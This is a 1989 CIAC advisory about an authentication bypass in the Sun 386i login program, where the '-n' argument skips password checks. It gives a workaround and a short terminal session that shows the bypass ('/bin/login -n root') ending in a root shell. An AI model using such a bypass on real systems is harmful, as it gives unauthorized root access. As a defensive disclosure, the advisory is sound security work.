ov 



formation



________________________________________________________________
		THE COMPUTER INCIDENT ADVISORY CAPABILITY

 				CIAC

			ADVISORY    NOTICE
________________________________________________________________


                     COMPUTER SECURITY INFORMATION

  		 Authentication bypass in Sun 386i machines

The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun 
OS (SOS), accepts the argument "-n" which bypasses authentication.  It was
apparently added in order to allow the Sun program "logintool" to do the
authentication and have login do the housekeeping.  This allows a user who
discovers the new argument to the login program to become a root user in 
several ways.  An example of one method is attached. 

A temporary solution is to disable logintool and patch the binary using 
the "strings" and "adb"method used last November.  Alternatively and more 
simly, log in a root and issue the command

			chmod 110 /bin/login

Example of login endrun:
---------------------------------------------------
Script started on Tue Apr 11 14:16:25 1989
myhost[1] whoami
oconnor
myhost[2] /bin/login -n root
Login incorrect
login: onceuponatime
No home directory specified in password file!  Logging in with home=/
# whoami
root
# who a i
myhost!onceupon ttyp2   Apr 11 14:17
# ^D myhost1[3] ^D
script done on Tue Apr 11 14:17:34 1989
---------------------------------------------------

Sun is presently working on a patch.  When it is available, CIAC will
inform you accordingly. 

For questions or additional information, please contact

                                 Gene Schultz
                                 CIAC Team Leader
                                 (415) 422-8193 or FTS 532-8193
                                 gschultz%nsspa@icdc.llnl.gov